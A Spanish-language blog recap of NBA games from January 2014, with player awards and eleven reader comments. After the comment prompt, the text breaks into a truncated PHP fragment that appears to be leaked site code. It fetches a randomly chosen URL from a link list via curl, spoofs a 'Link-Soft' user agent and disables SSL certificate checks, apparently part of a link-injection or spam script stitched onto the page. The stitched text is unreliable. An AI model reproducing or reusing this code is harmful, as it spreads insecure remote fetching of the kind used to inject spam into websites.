La Crónica: No hay gira perfecta

09 de January de 2014 por Simon

Los Golden State Warriors tenían anoche la posibilidad por primera vez en la historia de conseguir un pleno de victorias en una gira de 7 partidos pero fallaron en el último, en Brooklyn. Para los de Kidd no pesó la baja de Deron Williams y con un quinteto de pequeños (Paul Pierce saltó a la cancha como teórico 4) consiguieron doblegar a los enrachados Warriors. La gran actuación de Stephen Curry se vio empañada por una pérdida a falta de 13 segundos del final que enterró toda opción de empatar el partido para su equipo (98-102). Destacar en Brooklyn el gran partido de Joe Johnson y la aportación desde el banco de Blatche y Teletovic pero sobretodo la gran defensa en el último minuto de los Nets que con esta victoria se colocan por primera vez en la temporada en puestos de Play Off. Seguro que Indiana y Miami preferirán evitarlos en primera ronda a pesar de que no estén a buen nivel. Los grandes perjudicados de esta entrada en la lucha por el título de Brooklyn son los Detroit Pistons que no levantan cabeza y han perdido 8 de los últimos 9 partidos. Ya son famosos los apagones de los Pistons en las segundas partes y aunque ayer no fuera tan escandaloso les volvió a pasar lo que aprovechó Toronto para llevarse una nueva victoria fácil (91-112). 

Otrora los duelos entre Dallas Mavericks y San Antonio Spurs suponían una lucha encarnizada por el primer puesto de la división y sobre todo por dilucidar quien era el mejor equipo del estado pero desde hace un tiempo esto no es así. Los Spurs han hecho de los Mavs su juguete particular como demuestran las siete victorias consecutivas que acumulan en sus enfrentamientos directos. Ayer San Antonio no pasó ningún apuro y decidió el partido mucho antes del final (90-112). Otro de los líderes del Oeste, Portland, tuvo que esperar un poco más para sentenciar su duelo ya que los Magic plantaron cara hasta el último cuarto en el que Portland destapó el tarro de las esencias y les consiguió dejar atrás (94-110).

El resto de equipos de Play Off del oeste que entraban ayer en liza no fallaron y contaron sus partidos por victorias. Los Clippers vencieron a unos peleones Celtics en otro buen partido de Collison en el que la pareja interior de los angelinos fueron los amos y señores del encuentro, sobre todo Griffin que dio un buen “meneo” a Kris Humphries (105-111). Houston tampoco falló y con un gran tercer cuarto en el que logró toda su ventaja, se impusieron con comodidad a los Lakers (99-113). Si pasó más apuros Phoenix Suns que tuvieron que esperar hasta los últimos segundos para llevarse la victoria de Minneapolis  en un partido igualadísimo que resolvió Gerald Green con una canasta desde la esquina a falta de 3 segundos. En la última jugada, Kevin Martin no consiguió anotar y los Suns pudieron celebrar la victoria (104-103).

Desde 2006 no ganan los Pacers en Atlanta y anoche no era el día en el que los líderes de la liga tenían que romper la racha. Atlanta les venció gracias a un gran primer cuarto que les permitió estar siempre por delante en el marcador (87-97). Por último, Wizards venció en New Orleans en un partido mucho más cómodo de lo que el marcador refleja pues los Pelicans maquillaron el marcador en el último cuarto (102-96).

PREMIOS

MVP: James Harden lideró a los Rockets con 34 puntos, 4 rebotes, 4 asistencias y 5 robos y protagonizó un gran tercer cuarto en el que anotó 17 puntos. Por su parte, Lamarcus Aldridge arrolló a los defensores interiores de los Magic con 36 puntos, 9 rebotes y 3 tapones. Su compañero Nico Batum acabó el partido con un triple doble (14 puntos, 14 asistencias y 10 rebotes).

Rookie: Buen partido de Kentavious Caldwell-Pope, posiblemente el mejor del año. A su habitual desempeño en defensa unió un buen acierto en el tiro y acabó con 13 puntos.

Sorpresa: Jared Dudley jugó uno de sus mejores partidos de la temporada. Acabó el partido con una completa estadística: 18 puntos, 2 rebotes, 3 asistencias, 4 robos y 3 tapones.

Decepción: Toca atizar a varios de los grandes. Kevin Love en 15 puntos tras ser capaz solo de anotar 4 de sus 20 intentos a canasta, Dirk Nowitzki se quedó en 8 puntos tras fallar 11 de 14 lanzamientos, Roy Hibbert falló 7 de 8 y se quedó en 2 y Paul Millsap no pasó de los 4 tras anotar sólo un 1 de 10. Entre los 4 consiguieron anotar 9 de 52 intentos.

Esfuerzo en vano: Esta vez los 34 puntos, 5 rebotes y 7 asistencias de Stephen Curry no encontraron premio.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Josgel dice:
    #1

    Pero Antic como rookie no lo hizo mal aunque esté un poco pasadito, 16 puntos con 3 triples y cuatro rebotes. El hombre hace lo que puede para substituir a Horford.

      Citar

  2. Esteban dice:
    #2

    Josgel:
    Pero Antic como rookie no lo hizo mal aunque esté un poco pasadito, 16 puntos con 3 triples y cuatro rebotes. El hombre hace lo que puede para substituir a Horford.

    desde la lesion de Harford, los números de Antic lo habiltan a pelear por el ROY, pero lo cierto es que antes de la lesion del dominicano, Pero jugo muchos partidos con pesimas estadisticas y levantan esos numeros no va a ser facil

    igualmente, bravo popr el, un centro de verdadero tamaño, con buen pase y tiro mas que respetable de 3, no existen en la nba, vemos muchos 4 con alcance, pero un centro verdadero en la NBA tirando triples? desde SAM PERKINS

      Citar

  3. Esteban dice:
    #3

    no quiero legantar polemica, pero Curry no fue el unico que perdio una bola clave en los ultimos 13 segundos del partido, tambien un tal rubio hizo lo mismo, y green gano el partido en la ultima bola

    por otra parte, Dragic no depende de Bledsoe para meter a los suns en PO, es crack por si mismo,hoy por hoy el base mas subestimado de la liga

    algunos minutitos de algo de utilidad para Alex LEN, no todo esta perdido con el ucraniano

      Citar

  4. HisRoyalAirness dice:
    #4

    Esteban:
    no quiero legantar polemica, pero Curry no fue el unico que perdio una bola clave en los ultimos 13 segundos del partido, tambien un tal rubio hizo lo mismo, y green gano el partido en la ultima bola

    por otra parte, Dragic no depende de Bledsoe para meter a los suns en PO, es crack por si mismo,hoy por hoy el base mas subestimado de la liga

    algunos minutitos de algo de utilidad para Alex LEN, no todo esta perdido con el ucraniano

    La última bola fue para los Wolves

      Citar

  5. Esteban dice:
    #5

    HisRoyalAirness: La última bola fue para los Wolves

    es cierto le quedaron 2 segundos a los wolves despues del triple de green

      Citar

  6. Jose Luis dice:
    #6

    Nadie nunca le pitará falta en ataque a Griffin por usar su brazo libre al tratar e hacer un mate, ¿no?

      Citar

  7. Ruxixon dice:
    #7

    Gran error de Minny esta noche dejándose los cuernos en su batalla contra los árbitros,la primera mitad tirada entre sus fustraciones.En la segunda parte salieron sólo a jugar y se notó,aunque al final perdieron.Significativo ese dato de que en los partidos que han concluido con un margen de 4 o menos puntos,los Timberwolves llevan un 0-10.Preocupante para las noches de PO…si llegan.

    Dragic se ha confirmado como un tio en el que depositar la confianza,está claro,quien lo iba a decir cuando aterrizó en la NBA.

      Citar

  8. Anónimo dice:
    #8

    Doble falta de Dragic a Rubio en la jugada en que pierde la bola en el último minuto (una con el cuerpo, otra con la pierna).

      Citar

  9. Lucho dice:
    #9

    Yo no puedp hablar de base mas subestimado de la NBA estando ese tal Tony Parker (que vale, en el blog NO se lo subestima pero en los demás lados si)

      Citar

  10. Esteban dice:
    #10

    no hemnos comentado nada al respecto, pero parece ultimamente que el que ha renacido es Pau Gasol,

    una temporada pasada para el olvido y un arranque mas que dudoso (cuando debia salirse siendo practicamente unica espada de su equipo) dio para que muchos lo den por muerto y lo vieran en el barsa el año que viene, pero ya hace un mes que viene jugando al doble-doble practicamente todas las noche, ha elevado sus numeros en puntos y rebotes y enserio que lo esta haciendoi bien (independientemente de la millonada que cobra),

    aun hay basquet ahi, y si no lo traspasan este año a un equipo con aspiraciones, ahora vale la pena una renovacion que parecia imposible, de seguir asi, podra pedir hasta unos 10 millones el proximo año

      Citar

  11. Schize dice:
    #11

    Estoy de acuerdo, Esteban. Teniendo en cuenta su situación en el equipo, con tanto rumor y tanta muestra de querer desprenderse de él, está jugando a un muy buen nivel y mostrando personalidad y profesionalidad. Espero que mantenga el ritmo y pueda ganarse un buen contrato o ir a un grande. Me encantaría verlo en los Spurs con Duncan.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>